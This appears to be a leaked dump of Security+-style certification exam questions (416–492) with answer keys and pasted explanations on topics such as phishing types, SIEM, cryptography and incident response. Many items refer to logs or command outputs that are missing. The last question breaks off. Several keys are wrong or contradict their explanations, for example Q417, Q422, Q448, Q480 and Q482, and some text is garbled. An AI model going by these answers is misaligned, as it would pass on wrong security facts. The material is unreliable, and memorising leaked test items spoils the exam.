QUESTION 416
A major clothing company recently lost a large amount of proprietary information. 
The security officer must find a solution to ensure this never happens again.
Which of the following is the BEST technical implementation to prevent this from happening again?

A. Configure DLP solutions
B. Disable peer-to-peer sharing.
C. Enable role-based access controls 
D. Mandate job rotation.
E. Implement content filters

Answer: A

END
QUESTION 417
Which of the following types of attacks is specific to the individual it targets?

A. Whaling 
B. Pharming 
C. Smishing
D. Credential harvesting

Answer: D

END
QUESTION 418
A financial analyst has been accused of violating the company's AUP and there is forensic evidence to 
substantiate the allegation. Which of the following would dispute the analyst's claim of innocence?

A. Legal hold
B. Order of volatility 
C. Non-repudiation 
D. Chain of custody

Answer: C

END
QUESTION 419
A large financial services firm recently released information regarding a security breach within its corporate network that began several years before. During the time frame in which the breach occurred, indicators show an attacker gained administrative access to the network through a file download from a social media site and subsequently installed it without the user's knowledge. Since the compromise, the attacker was able to take command and control of the computer systems anonymously while obtaining sensitive corporate and personal employee information. Which of the following methods did the attacker MOST likely use to gain access?

A. A bot
B. A fileless virus 
C. A logic bomb 
D. A RAT

Answer: D

A fileless virus (also called fileless malware) is a type of malicious software that runs in memory. In contrast, most malware is a file written to disk. It’s relatively new in the malware family but is increasing in popularity among attackers due to its success at bypassing anti-malware programs. Symantec reported that fileless malware attacks increased more than 1,000 percent in 2018.

END
QUESTION 420
Which of the following cryptographic concepts would a security engineer utilize while implementing non-repudiation? (Select TWO)

A. Block cipher 
B. Hashing
C. Private key
D. Perfect forward secrecy 
E. Salting
F. Symmetric keys

Answer: BC
 
END
QUESTION 421
A security administrator is setting up a SIEM to help monitor for notable events across the enterprise. 
Which of the following control types does this BEST represent?

A. Preventive
B. Compensating 
C. Corrective
D. Detective

Answer: D

END
QUESTION 422
Which of the following BEST describes a social-engineering attack that relies on an executive at a small 
business visiting a fake banking website where credit card and account details are harvested?

A. Whaling 
B. Spam
C. Invoice scam 
D. Pharming

Answer: A

Pharming is an advanced form of social engineering in which the attacker creates a fake website, 
such as a “Microsoft” login portal, and then tricks the DNS server into redirecting their targets to this website.

END
QUESTION 423
A retail company that is launching a new website to showcase the company's product line and other information for online shoppers registered the following URLs:









Which of the following should the company use to secure its website if the company is concerned with convenience and cost?

A. A self-signed certificate 
B. A root certificate
C. A code-signing certificate 
D. A wildcard certificate
E. An extended validation certificate

Answer: D

END
QUESTION 424
An organization would like to remediate the risk associated with its cloud service provider not meeting its advertised 99.999% availability metrics. Which of the following should the organization consult for the exact requirements for the cloud provider?

A. SLA 
B. BPA 
C. NDA 
D. MOU

Answer: A

END
QUESTION 425
A network analyst is setting up a wireless access point for a home office in a remote, rural location. 
The requirement is that users need to connect to the access point securely, but do not want to have to remember passwords. Which of the following should the network analyst enable to meet the requirement?

A. MAC address filtering 
B. 802.1X
C. Captive portal 
D. WPS

Answer: D

END
QUESTION 426
During an incident, a company’s CIRT determines it is necessary to observe the continued network-based transactions between a callback domain and the malware running on an enterprise PC. Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral spread and the risk that the adversary would notice any changes?

A. Physically move the PC to a separate Internet point of presence. 
B. Create and apply microsegmentation rules.
C. Emulate the malware in a heavily monitored DMZ segment. 
D. Apply network blacklisting rules for the adversary domain.

Answer: B

What is microsegmentation? How getting granular improves network security | Network World

Microsegmentation is a method of creating secure zones in data centers and cloud deployments that allows companies 
to isolate workloads from one another and secure them individually. It’s aimed at making network security more granular. 

END
QUESTION 427
A company has three technicians who share the same credentials for troubleshooting systems. Every time credentials are changed, the new ones are sent by email to all three technicians. The security administrator has become aware of this situation and wants to implement a solution to mitigate the risk. Which of the following is the BEST solution for company to implement?

A. SSO authentication 
B. SSH keys
C. OAuth authentication 
D. Password vaults

Answer: B

END
QUESTION 428
An enterprise has hired an outside security firm to facilitate penetration testing on its network and applications. 
The firm has agreed to pay for each vulnerability that is discovered. 
Which of the following BEST represents the type of testing that is being used?

A. White-box 
B. Red-team 
C. Bug bounty 
D. Gray-box 
E. Black-box

Answer: C

END
QUESTION 429
If a current private key is compromised, which of the following would ensure it cannot be used to decrypt all historical data?

A. Perfect forward secrecy
B. Elliptic-curve cryptography 
C. Key stretching
D. Homomorphic encryption

Answer: A

END
QUESTION 430
After a hardware incident, an unplanned emergency maintenance activity was conducted to rectify the issue. Multiple alerts were generated on the SIEM during this period of time. Which of the following BEST explains what happened?

A. The unexpected traffic correlated against multiple rules, generating multiple alerts. 
B. Multiple alerts were generated due to an attack occurring at the same time.
C. An error in the correlation rules triggered multiple alerts.
D. The SIEM was unable to correlate the rules, triggering the alerts.

Answer: A

END
QUESTION 431
Which of the following environments utilizes dummy data and is MOST likely to be installed locally on a system that allows code to be assessed directly and modified easily with each build?

A. Production 
B. Test
C. Staging
D. Development

Answer: D

Development—the code will be hosted on a secure server. Each developer will check out a portion of code for editing on his 
or her local machine. The local machine will normally be configured with a sandbox for local testing. This ensures that 
whatever other processes are being run locally do not interfere with or compromise the application being developed.

END
QUESTION 432
A company is implementing a new SIEM to log and send alerts whenever malicious activity is blocked by its antivirus and web content filters. Which of the following is the primary use case for this scenario?

A. Implementation of preventive controls 
B. Implementation of detective controls 
C. Implementation of deterrent controls 
D. Implementation of corrective controls

Answer: A

The primary use case consists of a standard flow of events in the system that describes a standard system behavior. 
The primary use case represents the normal, expected, and successful completion of the use case.

END
QUESTION 433
A developer is concerned about people downloading fake malware-infected replicas of a popular game. 
Which of the following should the developer do to help verify legitimate versions of the game for users?

A. Digitally sign the relevant game files.
B. Embed a watermark using steganography.
C. Implement TLS on the license activation server. 
D. Fuzz the application for unknown vulnerabilities.

Answer: A

END
QUESTION 434
After segmenting the network, the network manager wants to control the traffic between the segments. 
Which of the following should the manager use to control the network traffic?

A. A DMZ 
B. A VPN 
C. A VLAN 
D. An ACL

Answer: D

END
QUESTION 435
An attack relies on an end user visiting a website the end user would typically visit, however, the site is compromised and uses vulnerabilities in the end user’s browser to deploy malicious software. Which of the following types of attack does this describe?

A. Smishing
B. Whaling
C. Watering hole 
D. Phishing

Answer: C

END
QUESTION 436
A Chief Security Officer (CSO) has asked a technician to devise a solution that can detect unauthorized execution privileges from the OS in both executable, data files and can work in conjunction with proxies or UTM.
Which of the following would BEST meet the CSO's requirements?	

A. Fuzzing
B. Sandboxing
C. Static code analysis 
D. Code review

Answer: B

END
QUESTION 437
An organization has various applications that contain sensitive data hosted in the cloud. 
The company's leaders are concerned about lateral movement across applications of different trust levels. 
Which of the following solutions should the organization implement to address the concern?

A. ISFW (Internal Segmentation FireWall)
B. UTM 
C. SWG 
D. CASB

Answer: D

END
QUESTION 438
A forensics investigator is examining a number of unauthorized payments that were reported on the company's website. 
Some unusual log entries show users received an email from an unwanted mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to the phishing team, and the forwarded email revealed the link to be:



Which of the following will the forensics investigator MOST likely determine has occurred?

A. SQL injection
B. Broken authentication 
C. XSS
D. XSRF

Answer: D

END
QUESTION 439
Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations. 
Which of the following documents did Ann receive?

A. An annual privacy notice
B. A non-disclosure agreement 
C. A privileged-user agreement
D. A memorandum of understanding

Answer: A

END
QUESTION 440
Which of the following would BEST identify and remediate a data-loss event in an enterprise using third-party, web-based services and file-sharing platforms?

A. SIEM 
B. CASB 
C. UTM 
D. EDR

Answer: B

END
QUESTION 441
While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network switches. Which of the following is the security analyst MOST likely observing?

A. SNMP traps
B. A Telnet session
C. An SSH connection 
D. SFTP traffic

Answer: B

END
QUESTION 442
An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Select TWO).

A. MAC filtering
B. Zero Trust segmentation 
C. Network access control 
D. Access control vestibules 
E. Guards
F. Bollards

Answer: BD

Zero Trust networking (ZTN) is the application of the zero trust principles to enterprise and government agency 
IP networks. Among other things, ZTN integrates IAM into IP routing and prohibits the establishment of a single 
TCP/UDP session without prior authentication and authorization.

END
QUESTION 443
A security analyst is hardening a network infrastructure. The analyst is given the following requirements:

- Preserve the use of public IP addresses assigned to equipment on the core router.
- Enable "in transport `encryption protection to the web server with the strongest ciphers.

Which of the following should the analyst implement to meet these requirements? (Select TWO).

A. Configure VLANs on the core router 
B. Configure NAT on the core router 
C. Configure BGP on the core router
D. Configure AES encryption on the web server 
E. Enable 3DES encryption on the web server 
F. Enable TLSv1.2 encryption on the web server

Answer: BF

END
QUESTION 444
During an investigation, a security manager receives notification from local authorities that company proprietary data was found on a former employee’s home computer. The former employee's corporate workstation has since been repurposed, and the data on the hard drive has been overwritten. Which of the following would BEST provide the security manager with enough details to determine when the data was removed from the company network?

A. Properly configured hosts with security logging
B. Properly configured endpoint security tool with darting 
C. Properly configured SIEM with retention policies
D. Properly configured USB blocker with encryption

Answer: C

https://www.endpointprotector.com/

END
QUESTION 445
The security team received a report of copyright infringement from the IP space of the corporate network. The report provided a precise time stamp for the incident as well as the name of the copyrighted file. The analyst has been tasked with determining the infringing source machine and instructed to implement measures to prevent such incidents from occurring again. Which of the following is MOST capable of accomplishing both tasks?

A. HIDS
B. Allow list 
C. TPM
D. NGFW

Answer: D

An NGFW performs deep-packet inspection, adding application-level inspection as a core feature. The NGFW is aware of common application protocols used on the Internet, such as FTP and HTTP. By using deep-packet inspection, the NGFW 
can identify application commands and detect potentially malicious activity.

END
QUESTION 446
A company recently experienced an attack during which its main website was directed to the attacker's web server, allowing the attacker to harvest credentials from unsuspecting customers. Which of the following should the company implement to prevent this type of attack occurring in the future?

A. IPSec
B. SSL/TLS 
C. DNSSEC 
D. S/MIME

Answer: C

END
QUESTION 447
A security researcher is tracking an adversary by noting its attack and techniques based on its capabilities, infrastructure, and victims. Which of the following is the researcher MOST likely using?

A. The Diamond Model of intrusion Analysis 
B. The Cyber Kill Chain\
C. The MITRE CVE database
D. The incident response process

Answer: A

The Diamond Model of Intrusion Analysis focuses on understanding the attacker by analyzing four key components of every intrusion event. These four components are: 

Adversary - Adversaries can be identified by email addresses, handles used in online forums, memberships in advanced persistent threat groups, and other identifiers. 

Capabilities - Capabilities refer to the malware, exploits, and other hacker tools used in the intrusion.

Infrastructure - The infrastructure refers to the Internet domain names, email addresses, and IP addresses used by the adversary.

Victim - Victims can be identified by their names, email addresses, or network identifiers.

It starts with the idea that every intrusion event has an adversary that uses a capability across an infrastructure against a victim. These core components can be mapped to different phases of a cyber kill chain. The same adversary performs reconnaissance, delivers a weapon, exploits a vulnerability, and so on through the cyber kill chain. The capabilities, infrastructure, and victim may change within the kill chain, but the adversary remains the same. For example, the capability at the delivery stage may be malware delivered via a phishing email. The capability at the installation stage may be a malicious script that creates a backdoor. By analyzing these components in multiple attacks, it reveals similarities. For example, an attack against BizzFad might have the same components as an attack against Monstromart. This knowledge gives cybersecurity professionals insight into possible future attacks, and they can disrupt the kill chain.

Cyber Kill Chain - Historically, kill chain has been a military concept related to an attack. It starts with the identification of a target, dispatching resources to the target, someone deciding to attack and giving the order, and it ends with the destruction of the target. Military personnel attempt to break an opponent’s kill chain, such as by disrupting communication methods. The cyber kill chain is similar. Scientists at Lockheed-Martin identified an intrusion kill chain with the following elements performed in order from start to finish: 

Reconnaissance - This includes researching, identifying, and selecting targets.

Weaponization - Malware, such as a remote access Trojan (RAT), is embedded within a deliverable payload, such as an infected Microsoft Office document.

Delivery - The payload is transmitted to the target. Malware is often delivered as an attachment within a phishing email.

Exploitation - After the weapon is delivered, it activates and triggers the exploit. Exploits often target an application or operating system vulnerability.

Installation - The exploit will often install a remote access Trojan or a backdoor on the attacked system. This allows the attacker to maintain persistence inside the exploited environment.

Command and Control (C2) - Infected systems often send out a beacon to an Internet-based server. This establishes the C2 channel, giving attackers full access to the infected system.

Actions on Objectives - At this point, attackers can begin taking action to achieve their ultimate goals. It could be installing ransomware or collecting, encrypting, and extracting data from the infected environment.

By understanding the intrusion kill chain, it becomes a little easier to identify ways to disrupt it.

END
QUESTION 448
A security analyst must enforce policies to harden a MOM (Message orientated Middleware) infrastructure. 
The requirements are as follows:

- Ensure mobile devices can be traded and wiped. 
- Confirm mobile devices are encrypted.

Which of the following should the analyst enable on all the devices to meet these requirements?

A. Geofencing
B. Biometric authentication
C. Geolocation 
D. Geotagging

Answer: C

Message-oriented middleware is software or hardware infrastructure supporting sending and receiving messages between distributed systems. MOM allows application modules to be distributed over heterogeneous platforms and reduces the complexity of developing applications that span multiple operating systems and network protocols. The middleware creates a distributed communications layer that insulates the application developer from the details of the various operating systems and network interfaces. APIs that extend across diverse platforms and networks are typically provided by MOM.

> Geolocation - Mobile devices commonly include GPS capabilities that are used for geolocation. Applications commonly use GPS to identify the location of the device and device movement. GPS can also be used to locate a lost device. 

> Geofencing - Organizations sometimes use GPS to create a virtual fence or geographic boundary using geofencing technologies. Apps can respond when the device is within the virtual fence. As an example, an organization can configure mobile apps so that they will only run when the device is within the virtual fence. Similarly, an organization can configure a wireless network to only operate for mobile devices within the defined boundary. 

> GPS tagging - GPS tagging (also called geotagging) adds geographical information to files such as pictures when posting them to social media websites. For example, when you take a picture with a smartphone with GPS features enabled, the picture application adds latitude and longitude coordinates to the picture.

END
QUESTION 449
A user downloaded an extension for a browser, and the user’s device later became infected. 
The analyst who is investigating the incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running:


Which of the following is the malware using to execute the attack?

A. PowerShell 
B. Python
C. Bash 
D. Macros

Answer: A

END
QUESTION 450
An organization is building backup server rooms in geographically diverse locations. The Chief information Security Officer implemented a requirement on the project that states the new hardware cannot be susceptible to the same vulnerabilities in the existing server room. Which of the following should the systems engineer consider'?

A. Purchasing hardware from different vendors
B. Migrating workloads to public cloud infrastructure 
C. Implementing a robust patch management solution 
D. Designing new detective security controls

Answer: A

END
QUESTION 451
An engineer needs to deploy a security measure to identify and prevent data tampering within the enterprise.
Which of the following will accomplish this goal?

A. Antivirus 
B. IPS
C. FTP 
D. FIM

Answer: D 

Data tampering prevention can include simple security measures such as the encryption of data, and can include lengths such as using file integrity monitoring (FIM) systems for better security. https://www.cypressdatadefense.com/blog/data-tampering-prevention/

END
QUESTION 452
When planning to build a virtual environment, an administrator needs to achieve the following:

- Establish polices in limiting who can create new VMs 
- Allocate resources according to actual utilization`
- Require justification for requests outside of the standard requirements.
- Create standardized categories based on size and resource requirements

Which of the following is the administrator MOST likely trying to do?

A. Implement IaaS replication 
B. Protect against VM escape 
C. Deploy a PaaS
D. Avoid VM sprawl

Answer: D

END
QUESTION 453
The SIEM at an organization has detected suspicious traffic coming from a workstation in its internal network. 
An analyst in the SOC examines the workstation and discovers malware that is associated with a botnet is installed on the device. A review of the logs on the workstation reveals that the privileges of the local account were escalated to a local administrator. To which of the following groups should the analyst report this real-world event?

A. The NOC team
B. The vulnerability management team 
C. The CIRT
D. The red team

Answer: C

Incident response team - An incident response team is composed of employees with expertise in different areas. Organizations often refer to the team as an incident response team, a computer incident response team (CIRT), or a security incident response team. Combined, they have the knowledge and skills to respond to an incident. Due to the complex nature of incidents, the team often has extensive training. Training includes concepts, such as how to identify and validate an incident, how to collect evidence, and how to protect the collected evidence.

END
QUESTION 454
A security analyst has received several reports of an issue on an internal web application. Users state they are having to provide their credentials twice to log in. The analyst checks with the application team and notes this is not an expected behavior. After looking at several logs the analyst decides to run some commands on the gateway and obtains the following output Internet address:









Which of the following BEST describes the attack the company is experiencing?

A. MAC flooding 
B. URL redirection 
C. ARP poisoning
D. DNS hijacking

Answer: C

END
QUESTION 455
While investigating a data leakage incident, a security analyst reviews access control to cloud-hosted data. 
The following information was presented in a security posture report.







Based on the report, which of the following was the MOST likely attack vector used against the company?

A. Spyware
B. Logic bomb
C. Potentially unwanted programs 
D. Supply chain

Answer: A

END
QUESTION 456
Which of the following corporate policies is used to help prevent employee fraud and to detect system log modifications or other malicious activity based on tenure?

A. Background checks 
B. Mandatory vacation 
C. Social media analysis 
D. Separation of duties

Answer: B

END
QUESTION 457
Which of the following holds staff accountable while escorting unauthorized personnel?

A. Locks 
B. Badges
C. Cameras 
D. Visitor logs

Answer: D 

END
QUESTION 458
An analyst is generating a security report for the management team. 
Security guidelines recommend disabling all listening unencrypted services. Given this output from Nmap:


	





Which of the following should the analyst recommend to disable?

A. 21/tcp 
B. 22/tcp 
C. 23/tcp 
D. 443/tcp

Answer: C

END
QUESTION 459
A security analyst is Investigating a malware incident at a company. The malware is accessing a command-and-control website at www.comptia.com. All outbound Internet traffic is logged to a syslog server and stored in /logfiles/messages. Which of the following commands would be BEST for the analyst to use on the syslog server to search for recent traffic to the command-and-control website?








A. Option A 
B. Option B 
C. Option C 
D. Option D

Answer: C

The tail command prints the last “-n” (where n is a positive integer) lines of a file to the screen. The last lines in a log file are typically the most recent. The pipe “|” takes the output of one command and makes it the input to the next command. The grep command will search its input text for a matching pattern. The above command “pipeline” takes the most recent 500 lines from the /logfiles/messages file and prints any lines containing the text “www.comptia.com” to the screen for review.

END
QUESTION 460
Which of the following function as preventive, detective, and deterrent controls to reduce the risk of physical theft? (Select TWO).

A. Mantraps
B. Security guards 
C. Video surveillance
4D. Fences 
E. Bollards 
F. Antivirus

Answer: BC

END
QUESTION 461
The Chief Information Security Officer wants to pilot a new adaptive, user-based authentication method. 
The concept Includes granting logical access based on physical location and proximity. 
Which of the following Is the BEST solution for the pilot?

A. Geofencing
B. Self-sovereign identification 
C. PKl certificates
D. SSO

Answer: A

Self-Sovereign Identity: The Ultimate Beginners Guide! (tykn.tech)

END
QUESTION 462
A Chief Information Officer receives an email stating a database will be encrypted within 24 hours unless a payment of $20,000 is credited to the account mentioned in the email. This BEST describes a scenario related to:

A. whaling. 
B. smishing.
C. spear phishing 
D. vishing

Answer: A

END
QUESTION 463
A cyberthreat intelligence analyst is gathering data about a specific adversary using OSINT techniques.
Which of the following should the analyst use?

A. Internal log files
B. Government press releases 
C. Confidential reports
D. Proprietary databases

Answer: B

END
QUESTION 464
Which of the following would satisfy three-factor authentication?

A. Password, retina scanner, and NFC card
B. Password, fingerprint scanner, and retina scanner 
C. Password, hard token, and NFC card
D. Fingerprint scanner, hard token, and retina scanner

Answer: A

END
QUESTION 465
Which two features are available only in next-generation firewalls? (Choose two )

A. deep packet inspection 
B. packet filtering
C. application awareness 
D. stateful inspection
E. virtual private network

Answer: AC

A next-generation firewall (NGFW) is an advanced firewall that adds capabilities that aren’t available in first-generation or second-generation firewalls. The first generation of firewalls were packet-filtering firewalls, using stateless firewall rules, and could only allow or block traffic after evaluating individual packets. The second generation of firewalls added in stateful firewall rules. This allows firewalls to evaluate traffic based on its session state. Firewalls have steadily improved over the years, and if each improvement was labeled as another generation, we might be on the ninety-ninth generation. Thankfully, we’re just using
NGFW to indicate that a firewall adds additional capabilities to first- and second-generation firewalls. An NGFW performs deep-packet inspection, adding application-level inspection as a core feature. The NGFW is aware of common application protocols used on the Internet, such as FTP and HTTP. By using deep-packet inspection, the NGFW can identify application commands and detect potentially malicious traffic. This allows it to apply content filtering and URL filtering.

END
QUESTION 466
A developer is building a new portal to deliver single-pane-of-glass management capabilities to customers with multiple firewalls. To Improve the user experience, the developer wants to implement an authentication and authorization standard that uses security tokens that contain assertions to pass user Information between nodes.
Which of the following roles should the developer configure to meet these requirements? (Select TWO).

A. Identity processor 
B. Service requestor 
C. Identity provider 
D. Service provider
E. Tokenized resource 
F. Notarized referral

Answer: CD

END
QUESTION 467
A security analyst was deploying a new website and found a connection attempting to authenticate on the site's portal. While investigating the incident, the analyst identified the following Input in the username field:



Which of the following BEST explains this type of attack?

A. DLL injection to hijack administrator services 
B. SQLi on the field to bypass authentication 
C. Execution of a stored XSS on the website
D. Code to execute a race condition on the server

Answer: B

END
QUESTION 468
Which of the following uses six initial steps that provide basic control over system security by including hardware and software inventory, vulnerability management, and continuous monitoring to minimize risk in all network environments?

A. ISO 27701
B. The Center for Internet Security 
C. SSAE SOC 2
D. NIST Risk Management Framework

Answer: D

ISO 27701, “Privacy Information Management System (PIMS),” is based on ISO 27001, and it outlines a framework for managing and protecting Personally Identifiable Information (PII). It provides organizations with guidance to comply with global privacy standards, such as the European Union General Data Protection Regulation (EU GDPR).

NIST SP 800-37, “Risk Management Framework for Information Systems and Organizations,” covers the Risk Management
Framework (RMF). While U.S. federal government agencies must adopt the RMF, many private sector organizations adopt it as well. RMF provides organizations with a seven-step process to identify and mitigate risks. The seven steps are: 

> Prepare
> Categorize 
> Select security controls
> Implement security controls
> Assess security controls. 
> Authorize information systems
> Monitor security controls

END
QUESTION 469
Developers are writing code and merging it into shared repositories several times a day, where it is tested automatically. Which of the following concepts does this BEST represent?

A. Functional testing 
B. Stored procedures 
C. Elasticity
D. Continuous integration

Answer: D 

Continuous Integration (CI) is a development practice where developers integrate code into a shared repository frequently, preferably several times a day. Each integration can then be verified by an automated build and automated tests.

END
QUESTION 470
Which of the following environments would MOST likely be used to assess the execution of component parts of a system at both the hardware and software levels and to measure performance characteristics?

A. Test
B. Staging
C. Development 
D. Production

Answer: B

Staging—this is a mirror of the production environment but may use test or sample data and will have additional access controls so that it is only accessible to test users. Testing at this stage will focus more on usability and performance.

END
QUESTION 471
Remote workers in an organization use company-provided laptops with locally installed applications and locally stored data. Users can store data on a remote server using an encrypted connection. The organization discovered data stored on a laptop had been made available to the public. Which of the following security solutions would mitigate the risk of future data disclosures?

A. FDE 
B. TPM 
C. HIDS 
D. VPN

Answer: A

END
QUESTION 472
Which of the following describes a maintenance metric that measures the average time required to troubleshoot and restore failed equipment?

A. RTO 
B. MTBF 
C. MTTR 
D. RPO

Answer: C 

Mean time to repair (MTTR) is a measure of the maintainability of a repairable item, which tells the average time required to repair a specific item or component and return it to working status. It is a basic measure of the maintainability of equipment and parts. This includes the notification time, diagnosis and the time spent on actual repair as well as other activities required before the equipment can be used again. 
Mean time to repair is also known as mean repair time. 
https://www.techopedia.com/definition/2719/mean-time-to-repair-mttr


END
QUESTION 473 
Which of the following is a difference between a DRP and a BCP?

A. A BCP keeps operations running during a disaster while a DRP does not.
B. A BCP prepares for any operational interruption while a DRP prepares for natural disasters. 
C. A BCP is a technical response to disasters while a DRP is operational.
D. A BCP Is formally written and approved while a DRP is not.

Answer: A

END
QUESTION 474
A grocery store is expressing security and reliability concerns regarding the on-site backup strategy currently being performed by locally attached disks. The main concerns are the physical security of the backup media and the durability of the data stored on these devices. Which of the following is a cost-effective approach to address these concerns?

A. Enhance resiliency by adding a hardware RAID.
B. Move data to a tape library and store the tapes off site 
C. Install a local network-attached storage.
D. Migrate to a cloud backup solution

Answer: D

END
QUESTION 475
A systems administrator is looking for a solution that will help prevent OAuth applications from being leveraged by hackers to trick users into authorizing the use of their corporate credentials. Which of the following BEST describes this solution?

A. CASB 
B. UTM
C. WAF 
D. VPC

Answer: A

END
QUESTION 476
Which of the following is an example of risk avoidance?

A. Installing security updates directly in production to expedite vulnerability fixes 
B. Buying insurance to prepare for financial loss associated with exploits
C. Not installing new software to prevent compatibility errors
D. Not taking preventive measures to stop the theft of equipment

Answer: C

END
QUESTION 477
A security assessment found that several embedded systems are running unsecure protocols. 
These systems were purchased two years ago and the company that developed them is no longer in business.
Which of the following constraints BEST describes the reason the findings cannot be remediated?

A. inability to authenticate 
B. Implied trust
C. Lack of computing power 
D. Unavailable patch

Answer: D

END
QUESTION 478
Which of the following should a technician consider when selecting an encryption method for data that needs 
to remain confidential for a specific length of time?

A. The key length of the encryption algorithm 
B. The encryption algorithm’s longevity
C. A method of introducing entropy into key calculations
D. The computational overhead of calculating the encryption key

Answer: C

Entropy and Weak Keys Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as it represents a 
message in a human language or programming language or data structure. The plaintext must be ordered for it to be 
intelligible to a person, computer processor, or database. One of the requirements of a strong cryptographic algorithm 
is to produce a disordered ciphertext. Put another way, the ciphertext must exhibit a high level of entropy. If any 
elements of order from the plaintext persist, it will make the ciphertext vulnerable to cryptanalysis, and the algorithm 
can be shown to be weak.

END
QUESTION 479
During an incident, an EDR system detects an increase in the number of encrypted outbound connections from multiple hosts. A firewall is also reporting an increase in outbound connections that use random high ports. An analyst plans to review the correlated logs to find the source of the incident. Which of the following tools will BEST assist the analyst?

A. A vulnerability scanner 
B. A NGFW
C. The Windows Event Viewer 
D. A SIEM

Answer: D

END
QUESTION 480
A company wants to deploy systems alongside production systems to entice threat actors and to learn more about attackers. Which of the following BEST describe these systems?

A. DNS sinkholes 
B. Honeypots
C. Virtual machines 
D. Neural network

Answer: B

Machine learning (ML) uses algorithms to parse input data and then develop strategies for using that data, such 
as identifying an object as a type, working out the best next move in a game, and so on. Unlike an expert system, 
machine learning can modify the algorithms it uses to parse data and develop strategies. It can make gradual 
improvements in the decision-making processes. The structure that facilitates this learning process is referred to as 
an artificial neural network (ANN).

END
QUESTION 481
A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the user’s PCs. Which of the following is the MOST likely cause of this issue?

A. TFTP was disabled on the local hosts
B. SSH was turned off instead of modifying the configuration file
C. Remote login was disabled in the network.config instead of using the sshd.conf 
D. Network services are no longer running on the NAS

Answer: B

https://medium.com/code-kings/linux-ubuntu-how-to-use-ssh-config-to-simplify-scp-commands-48f464acfa82


SSH Commands SSH commands are used to connect to hosts and set up authentication methods. To connect to an SSH server at 10.1.0.10 using an account named "bobby" and password authentication, run: 

ssh bobby@10.1.0.10 
The following commands create a new key pair and copy it to an account on the remote server: 

ssh-keygen -t rsa 
ssh-copy-id bobby@10.1.0.10 

At an SSH prompt, you can now use the standard Linux shell commands. Use exit to close the connection. You can also use the scp command to copy a file from the remote server to the local host: 

scp bobby@10.1.0.10:/logs/audit.log audit.log Reverse the arguments to copy a file from the local host to the remote server. To copy the contents of a directory and any subdirectories (recursively), use the -r option.

Network configuration is the process of assigning network settings, policies, flows, and controls. In a virtual network, it's easier to make network configuration changes because physical network devices appliances are replaced by software, removing the need for extensive manual configuration.

END
QUESTION 482
Which of the following BEST describes the method a security analyst would use to confirm a file that is downloaded from a trusted security website is not altered in transit or corrupted using a verified checksum?

A. Hashing 
B. Salting 
C. Integrity
D. Digital signature

Answer: D

END
QUESTION 483
Users reported several suspicious activities within the last two weeks that resulted in several unauthorized transactions. Upon investigation, the security analyst found the following:

- Multiple reports of breached credentials within that time period 
- Traffic being redirected in certain parts of the network
- Fraudulent emails being sent by various internal users without their consent

Which of the following types of attacks was MOST likely used?

A. Replay attack 
B. Race condition
C. Cross site scripting 
D. Request forgeries

Answer: C

END
QUESTION 484
A network analyst is investigating compromised corporate information. The analyst leads to a theory that network traffic was intercepted before being transmitted to the internet. The following output was captured on an internal host:










Based on the IoC’s, which of the following was the MOST likely attack used to compromise the network communication? 

A. Denial of service 
B. ARP poisoning
C. Command injection 
D. MAC flooding

Answer: B

END
QUESTION 485
A company's cybersecurity department is looking for a new solution to maintain high availability. 
Which of the following can be utilized to build a solution? (Select Two)

A. A stateful inspection 
B. IP hashes
C. A round robin 
D. A VLAN
E. A DMZ

Answer: CD

VLAN pooling is a feature that enables you to group multiple wireless controller VLANs to form a VLAN pool. Configure a VLAN pool to load-balance sessions evenly across multiple VLANs. Individual VLANs are then assigned dynamically from the pool, using a round robin algorithm, when a wireless client accesses the network.
 
END
QUESTION 486
A user's PC was recently infected by malware. The user has a legacy printer without vendor support, and the user's OS is fully patched. The user downloaded a driver package from the internet. No threats were found on the downloaded file, but during file installation, a malicious runtime threat was detected. Which of the following MOST likely caused the infection?

A. The driver has malware installed and was refactored upon download to avoid detection. 
B. The user's computer has a rootkit installed that has avoided detection until the new
driver overwrote key files.
C. The user's antivirus software definitions were out of date and were damaged by the installation of the driver.
D. The user's computer has been infected with a logic bomb set to run when new driver was installed.

Answer: A

A technique that malware authors like to do is to change the way the malware looks every time it's downloaded. 
This is metamorphic malware. It's a technique called refactoring. And every time somebody downloads malware, 
it's downloaded as a completely different executable.

END
QUESTION 487
Which of the following controls would BEST identify and report malicious insider activities?

A. An intrusion detection system 
B. A proxy
C. Audit trails
D. Strong authentication

Answer: C

END
QUESTION 488
A security analyst is investigating a phishing email that contains a malicious document directed to the company's Chief Executive Officer (CEO). Which of the following should the analyst perform to understand the threat and retrieve possible IoCs?

A. Run a vulnerability scan against the CEOs computer to find possible vulnerabilities. 
B. Install a sandbox to run the malicious payload in a safe environment.
C. Perform a traceroute to identify the communication path.
D. Use netstat to check whether communication has been made with a remote host.

Answer: B

END
QUESTION 489
A SOC is currently being outsourced. Which of the following is being used?

A. Microservices 
B. SaaS
7C. MSSP 
D. PaaS

Answer: C

Managed Security Services Provider (MSSP)—a means of fully outsourcing responsibility for information assurance to a third party. This type of solution is expensive but can be a good fit for an SME that has experienced rapid growth and has no in-house security capability. Of course, this type of outsourcing places a huge amount of trust in the MSSP. Maintaining effective oversight of the MSSP requires a good degree of internal security awareness and expertise. There could also be significant challenges in industries exposed to high degrees of regulation in terms of information processing.

END
QUESTION 490
A company is considering transitioning to the cloud. The company employs individuals from various locations around the world. The company does not want to increase its on-premises infrastructure blueprint and only wants to pay for additional compute power required. Which of the following solutions would BEST meet the needs of the company?

A. Private cloud
B. Hybrid environment
C. Managed security service provider 
D. Hot backup site

Answer: B

END
QUESTION 491
An organization recently discovered that a purchasing officer approved an invoice for an amount that was different than the original purchase order. After further investigation a security analyst determines that the digital signature for the fraudulent invoice is exactly the same as the digital signature for the correct invoice that had been approved Which of the following attacks MOST likely explains the behavior?

A. Birthday attack
B. Rainbow table 
C. Impersonation 
D. Whaling

Answer: A

END
QUESTION 492
A user's account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM:







Which of the following describes what is occurring?

A. An attacker is utilizing a password-spraying attack against the account. 
